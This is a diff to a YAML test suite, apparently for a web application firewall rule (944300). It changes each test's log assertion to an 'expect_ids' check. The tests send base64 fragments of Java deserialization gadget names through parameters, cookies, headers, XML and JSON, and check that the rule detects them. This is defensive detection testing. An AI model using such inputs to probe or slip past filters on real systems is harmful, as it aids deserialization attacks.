expect_ids: [944300] - test_id: 117 desc: "XML element value includes keyword GZvcmNsb3N1cmU" stages: @@ -2259,7 +2375,8 @@ tests: version: "HTTP/1.0" data: "GZvcmNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 118 desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" stages: @@ -2278,7 +2395,8 @@ tests: version: "HTTP/1.0" data: "GZvcmNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 119 desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" stages: 
@@ -2297,7 +2415,8 @@ tests: version: "HTTP/1.0" data: "test=GZvcmNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 120 desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" stages: @@ -2316,7 +2435,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"GZvcmNsb3N1cmU\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 121 desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" stages: @@ -2335,7 +2455,8 @@ tests: version: "HTTP/1.0" data: "{\"GZvcmNsb3N1cmU\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 122 desc: "Argument test includes keyword Bmb3JjbG9zdXJl" stages: @@ -2354,7 +2475,8 @@ tests: version: "HTTP/1.0" data: "test=Bmb3JjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 123 desc: "Argument name includes keyword Bmb3JjbG9zdXJl" stages: @@ -2373,7 +2495,8 @@ tests: version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 124 desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" stages: @@ -2393,7 +2516,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 125 desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" stages: @@ -2413,7 +2537,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 126 desc: "Request header test includes keyword Bmb3JjbG9zdXJl" stages: @@ -2433,7 +2558,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 127 desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" stages: 
@@ -2452,7 +2578,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 128 desc: "XML element value includes keyword Bmb3JjbG9zdXJl" stages: @@ -2471,7 +2598,8 @@ tests: version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 129 desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" stages: @@ -2490,7 +2618,8 @@ tests: version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 130 desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" stages: @@ -2509,7 +2638,8 @@ tests: version: "HTTP/1.0" data: "test=Bmb3JjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 131 desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" stages: @@ -2528,7 +2658,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 132 desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" stages: @@ -2547,7 +2678,8 @@ tests: version: "HTTP/1.0" data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 133 desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2566,7 +2698,8 @@ tests: version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 134 desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2585,7 +2718,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 135 desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: 
@@ -2605,7 +2739,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 136 desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2625,7 +2760,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 137 desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2645,7 +2781,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 138 desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2664,7 +2801,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 139 desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2683,7 +2821,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 140 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2702,7 +2841,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 141 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2721,7 +2861,8 @@ tests: version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 142 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2740,7 +2881,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 143 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: 
@@ -2759,7 +2901,8 @@ tests: version: "HTTP/1.0" data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 144 desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2778,7 +2921,8 @@ tests: version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 145 desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2797,7 +2941,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 146 desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2817,7 +2962,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 147 desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2837,7 +2983,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 148 desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2857,7 +3004,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 149 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2876,7 +3024,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 150 desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2895,7 +3044,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 151 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: 
@@ -2914,7 +3064,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 152 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2933,7 +3084,8 @@ tests: version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 153 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2952,7 +3104,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 154 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2971,7 +3124,8 @@ tests: version: "HTTP/1.0" data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 155 desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -2990,7 +3144,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 156 desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3009,7 +3164,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 157 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3029,7 +3185,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 158 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: 
@@ -3049,7 +3206,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 159 desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3069,7 +3227,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 160 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3088,7 +3247,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 161 desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3107,7 +3267,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 162 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3126,7 +3287,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 163 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3145,7 +3307,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 164 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3164,7 +3327,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 165 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: 
@@ -3183,7 +3347,8 @@ tests: version: "HTTP/1.0" data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 166 desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3202,7 +3367,8 @@ tests: version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 167 desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3221,7 +3387,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 168 desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3241,7 +3408,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 169 desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3261,7 +3429,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 170 desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3281,7 +3450,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 171 desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3300,7 +3470,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 172 desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3319,7 +3490,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 173 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: 
@@ -3338,7 +3510,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 174 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3357,7 +3530,8 @@ tests: version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 175 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3376,7 +3550,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 176 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3395,7 +3570,8 @@ tests: version: "HTTP/1.0" data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 177 desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3414,7 +3590,8 @@ tests: version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 178 desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3433,7 +3610,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 179 desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3453,7 +3631,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 180 desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: 
@@ -3473,7 +3652,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 181 desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3493,7 +3673,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 182 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3512,7 +3693,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 183 desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3531,7 +3713,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 184 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3550,7 +3733,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 185 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3569,7 +3753,8 @@ tests: version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 186 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3588,7 +3773,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 187 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: 
@@ -3607,7 +3793,8 @@ tests: version: "HTTP/1.0" data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 188 desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3626,7 +3813,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 189 desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3645,7 +3833,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 190 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3665,7 +3854,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 191 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3685,7 +3875,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 192 desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3705,7 +3896,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 193 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3724,7 +3916,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 194 desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3743,7 +3936,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 195 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: 
@@ -3762,7 +3956,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 196 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3781,7 +3976,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 197 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3800,7 +3996,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 198 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: @@ -3819,7 +4016,8 @@ tests: version: "HTTP/1.0" data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 199 desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3838,7 +4036,8 @@ tests: version: "HTTP/1.0" data: "test=aW52b2tlcnRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 200 desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3857,7 +4056,8 @@ tests: version: "HTTP/1.0" data: "aW52b2tlcnRyYW5zZm9ybWVy=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 201 desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3877,7 +4077,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 202 desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: 
@@ -3897,7 +4098,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 203 desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3917,7 +4119,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 204 desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3936,7 +4139,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 205 desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3955,7 +4159,8 @@ tests: version: "HTTP/1.0" data: "aW52b2tlcnRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 206 desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3974,7 +4179,8 @@ tests: version: "HTTP/1.0" data: "aW52b2tlcnRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 207 desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -3993,7 +4199,8 @@ tests: version: "HTTP/1.0" data: "test=aW52b2tlcnRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 208 desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -4012,7 +4219,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 209 desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: @@ -4031,7 +4239,8 @@ tests: version: "HTTP/1.0" data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 210 desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: 
@@ -4050,7 +4259,8 @@ tests: version: "HTTP/1.0" data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 211 desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4069,7 +4279,8 @@ tests: version: "HTTP/1.0" data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 212 desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4089,7 +4300,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 213 desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4109,7 +4321,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 214 desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4129,7 +4342,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 215 desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4148,7 +4362,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 216 desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4167,7 +4382,8 @@ tests: version: "HTTP/1.0" data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 217 desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4186,7 +4402,8 @@ tests: version: "HTTP/1.0" data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 218 desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: 
@@ -4205,7 +4422,8 @@ tests: version: "HTTP/1.0" data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 219 desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4224,7 +4442,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 220 desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: @@ -4243,7 +4462,8 @@ tests: version: "HTTP/1.0" data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 221 desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4262,7 +4482,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnZva2VydHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 222 desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4281,7 +4502,8 @@ tests: version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 223 desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: @@ -4301,7 +4523,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - 